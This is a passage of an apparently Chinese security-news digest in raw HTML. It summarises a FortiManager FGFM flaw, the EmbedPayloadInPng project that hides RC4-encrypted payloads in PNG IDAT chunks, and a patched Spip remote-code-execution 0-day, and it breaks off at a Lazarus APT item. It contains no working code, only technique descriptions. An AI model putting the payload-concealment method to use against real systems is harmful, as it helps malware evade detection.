padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">FortiNet在处理该漏洞的透明度和责任感上存在问题：尽管该漏洞已被广泛利用，FortiNet未能及时公开漏洞信息和补丁，延迟了用户的防御响应。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">FGFM协议的默认配置存在安全风险：FortiManager默认允许任何设备注册，只要有有效的证书，这降低了注册门槛，增加了被入侵的风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">FortiGate防火墙漏洞的普遍性：网页提到了另一个在2024年10月由CISA标记的FGFM漏洞（CVE-2024–23113），这表明FortiGate防火墙的漏洞并不个别。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">FortiNet的安全措施不完善：部分版本的补丁尚未发布，且即使发布了补丁，补丁的描述也缺乏详细的安全问题说明。</section></li></ul>
	<br/>
	<p>🏷️: FortiManager, 漏洞, 国家间谍, 网络安全, CVE</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x12
			 将有效载荷嵌入PNG文件的GitHub项目</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">GitHub - Maldev-Academy/EmbedPayloadInPng 仓库提供了一种将有效载荷嵌入PNG文件的方法，通过在多个IDAT部分中分割有效载荷，并使用RC4加密算法为每个部分单独加密。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.3296296296296296" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b9a1ab6b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAzZqicibYXwcbibEn6zxmvticLDcMtM9YRYSUzU0M4e2rISMZXglITnfulA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.8416666666666667" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=eb401672&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAvyFicbOO5xE8LPZHMZ1Kc2V0ics651unbg5zEgJ3iamR2wxHUwaWdVYIQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.49444444444444446" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=81aa0a7e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EA3zFicIJ7H6LdMLmczFhrX03miakHnSIOzTRatp5HFnRJvEw194lMn7Zw%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">将加密有效载荷嵌入PNG文件的多节段方法</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PNG 文件多段加密载荷嵌入技巧</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA1gsWxEFNuZfg2eB7Z3Fic0xewu1qKmBbibsvWibXq6RKW0g1pkiblGaeIg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA1gsWxEFNuZfg2eB7Z3Fic0xewu1qKmBbibsvWibXq6RKW0g1pkiblGaeIg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121542841241444"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">多个IDAT部分：有效载荷被分割并嵌入到PNG文件的多个IDAT部分中，每个部分都进行了RC4加密。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">加密方式：每个IDAT部分使用自己的16字节密钥进行RC4加密。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">文件结构：嵌入有效载荷的PNG文件结构包括一个随机IDAT部分标记有效载荷的开始，接着是多个包含加密有效载荷的IDAT部分。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">最大大小限制：由于IDAT部分的大小限制，每个部分的实际大小为8176字节，最后一个部分包含剩余的有效载荷字节。</section></li></ul>
	<br/>
	<p>🏷️: payload, PNG, 加密, IDAT, RC4</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x13
			 Spip内容管理系统0-day漏洞研究</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">这篇文章主要介绍了对 Spip 内容管理系统的一个 0-day 漏洞的研究，该漏洞允许未授权的远程代码执行（RCE），并已在 Spip 的 4.2.9 版本中的 4-3-0-alpha2、4-2-13 和 4.1.16 版本中被修复。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1.0015015015015014" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="666" src="https://wechat2rss.xlab.app/img-proxy/?k=557f19be&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAGicyiawXRoRSI9Qn8XUFsZRUVuaILibmduTMzozvDCibwZvuDcWseStUnw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.562962962962963" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=79a90908&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAEAZtD35wx37RmerDX0IB3YeBqqSkb9bkKq9mF1ffsULwTUGn10tNhA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.9443609022556391" data-w="665" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=b29814d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EA9jnvapum3ibg3qK5m4E81BIiaiaN2TOeia1YeOyNM0xIcFE7SGE2hwkIww%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SPIP 远程代码执行漏洞分析：The Feather篇</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAIY2vh5zvmc0eibj0icIbz6rI4HWntluZOwGKBAec847Drsbo4HD2dEvQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAIY2vh5zvmc0eibj0icIbz6rI4HWntluZOwGKBAec847Drsbo4HD2dEvQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848524128585158"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Spip 的安全性受到威胁：Spip 的一个 0-day 漏洞允许未授权的远程代码执行，这对 Spip 用户的安全性构成了严重的威胁。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">定期代码审计的重要性：作者通过定时任务每天审计代码更改，这表明了定期代码审计在发现安全漏洞中的重要性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">插件安全更新的必要性：即使 Spip 的核心代码被修复，如果相关插件没有更新，用户仍然可能面临风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">预览功能可能成为安全隐患：Spip 的预览功能存在安全漏洞，可以被利用来实现代码执行。</section></li></ul>
	<br/>
	<p>🏷️: Spip, 漏洞, 远程代码执行, 0-day, 安全修复</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x14
			 Lazarus APT组织的加密游戏：投资者与零日漏洞的对决</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
